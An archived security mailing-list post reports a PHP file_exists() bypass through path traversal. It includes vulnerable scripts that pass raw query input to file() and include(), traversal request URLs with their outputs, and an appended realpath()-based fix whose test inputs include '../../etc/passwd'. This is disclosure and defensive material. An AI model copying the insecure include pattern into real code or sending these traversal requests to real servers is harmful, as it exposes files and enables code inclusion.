Open Source and information security mailing list archives
From: lostnoobs at security-challenge.com (Nourredine Himeur)
Subject: file_exists() bypassing, critical problem?

Hi,
 There is a security problem with the file_exists() function which allows
 unauthorized users to bypass the function.
 For example, a user uses this function to check the existence of, and
 display the source code of, his file "my_file.php" in the "/test"
 directory.
 He uses for this a script like this one:
 ----- file_exists.php -----
 <?php
 // $var arrives straight from the query string (register_globals, PHP 4 era)
 if(file_exists($var)){
     echo("File exist<br><br>");
     $source = file( $var );
     while ( list( $num_line, $line ) = each( $source ) )
     {
         echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
     }
 }else{
     echo("File doesn't exist<br><br>");
     // the same raw $var is read here as well; only the message differs
     $source = file( $var );
     while ( list( $num_line, $line ) = each( $source ) )
     {
         echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
     }
 }
 ?>
 ----- file_exists.php -----
 He tests his script with the following address on his server:
 http://[server]/test/file_exists.php?var=my_file.php
 The file "my_file.php" contains the following text:
 ----- my_file.php -----
 PHP is a widely-used
 general-purpose scripting
 language that is especially
 suited for Web development
 and can be embedded into HTML.
 ----- my_file.php -----
 After launching his script, he obtains:
 ----- http://[server]/test/file_exists.php?var=my_file.php -----
 File exist
 Line 0: PHP is a widely-used
 Line 1: general-purpose scripting
 Line 2: language that is especially
 Line 3: suited for Web development
 Line 4: and can be embedded into HTML.
 ----- http://[server]/test/file_exists.php?var=my_file.php -----
 Up to here everything seems normal.
 If he tests it with another file name, he obtains:
 ----- http://[server]/test/file_exists.php?var=another_file.php -----
 File doesn't exist

 Warning: file(test): failed to open stream: No such file or directory in
 /home/xxx/www/test/file_exists.php on line 11
 Warning: Variable passed to each() is not an array or object in
 /home/xxx/www/test/file_exists.php on line 12
 ----- http://[server]/test/file_exists.php?var=another_file.php -----
 That is normal too...
 But if a user tests this script with the following link, for example:
 http://[server]/test/file_exists.php?var=anything/../my_file.php
 he obtains:
 ----- http://[server]/test/file_exists.php?var=anything/../my_file.php -----
 File doesn't exist
 Line 0: PHP is a widely-used
 Line 1: general-purpose scripting
 Line 2: language that is especially
 Line 3: suited for Web development
 Line 4: and can be embedded into HTML.
 ----- http://[server]/test/file_exists.php?var=anything/../my_file.php -----
 We can see that the file_exists() function returns that the file doesn't
 exist, but the source code has been displayed.
 It's a very critical bug because a malicious user can use it to bypass
 the file_exists() protection on an include() script, for example.

-------------------------------------------------------------------------------

Another, simpler example:

In the same directory :
test.php
-----------------------------------------------------------
<?php
// $page arrives straight from the query string (register_globals, PHP 4 era)
if(file_exists($page)){
    echo("Sorry the local page is protected");
}else{
    include($page);
}
?>
-----------------------------------------------------------

file.txt
-----------------------------------------------------------
Hello Word
-----------------------------------------------------------

http://www.example.com/test.php?page=file.txt

Result:
Sorry the local page is protected

http://www.example.com/test.php?page=./foo/../file.txt

Result:
Hello Word

The function file_exists() is bypassed.

-------------------------------------------------------------------------------


I want to know if you think that's a real vulnerability or not? (securityfocus says NO and doesn't want to publish it)

If you have any questions, don't hesitate to contact me.

Nourredine Himeur

lostnoobs@...urity-challenge.com

www.security-challenge.com
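Added example, not part of the original post: in both scripts above the raw query-string value is handed to file_exists() and then, separately, to file() or include(), so the check and the read can end up resolving "anything/../my_file.php" differently. The defensive pattern is to canonicalise the path once with realpath(), confine it to a base directory, and use that single canonical path for both the check and the read. The function name safe_read and the test directory are this example's own assumptions.

```php
<?php
// Resolve the user-supplied path once and reuse the canonical result
// for the existence check and the read (example code, not from the post).
function safe_read(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                     // base directory itself is missing
    }
    // realpath() walks the real filesystem: a dangling component such as
    // the "anything" in "anything/../my_file.php" makes it return false,
    // so there is no second, differently normalised path to read from.
    $real = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($real === false || !is_file($real)) {
        return null;                     // missing, or not a regular file
    }
    // Confinement: the canonical path must sit under $base (also catches
    // symlinks that point outside the directory, since they are resolved).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;                     // escaped the base directory
    }
    // Read the canonical path, never the raw $userPath.
    return file_get_contents($real);
}

// Constructed inputs for the example: the post's own request values plus
// a traversal attempt that must be refused.
$baseDir = __DIR__ . '/test';
foreach (['my_file.php', 'anything/../my_file.php', '../../etc/passwd'] as $p) {
    $content = safe_read($baseDir, $p);
    echo $p, ': ', $content === null ? 'denied' : 'ok (' . strlen($content) . " bytes)", "\n";
}
```

For an include() that chooses between a fixed set of pages, an explicit allowlist of names mapped to files is simpler still and needs no path handling at all.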
